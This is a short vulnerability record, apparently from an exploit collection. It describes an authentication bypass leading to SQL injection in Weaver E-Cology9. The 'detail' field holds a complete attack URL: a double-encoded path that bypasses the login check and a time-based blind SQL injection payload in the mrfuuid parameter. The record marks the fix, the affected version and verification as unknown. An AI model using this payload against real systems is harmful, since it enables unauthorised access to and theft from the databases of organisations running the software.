vendor = "泛微"
name = "泛微E-Cology9 FileDownloadLocation 身份认证绕过导致SQL注入"
type = "SQL注入"
version = "未知"
path = "/weaver/weaver.email.FileDownloadLocation/login/LoginSSOxjsp/x.FileDownloadLocation"
detail = "/weaver/FileDownloadLocation/login/LoginSSO.%256a%2573%2570?ddcode=7ea7ef3c41d67297&mrfuuid=1%27;if+db_name(1)=%27master%27+WAITFOR+delay+%270:0:5%27--+&mailid=0&a=.swf"
fix = "未知"
date = "0703"
label = "1day"
verifier = "未验真"
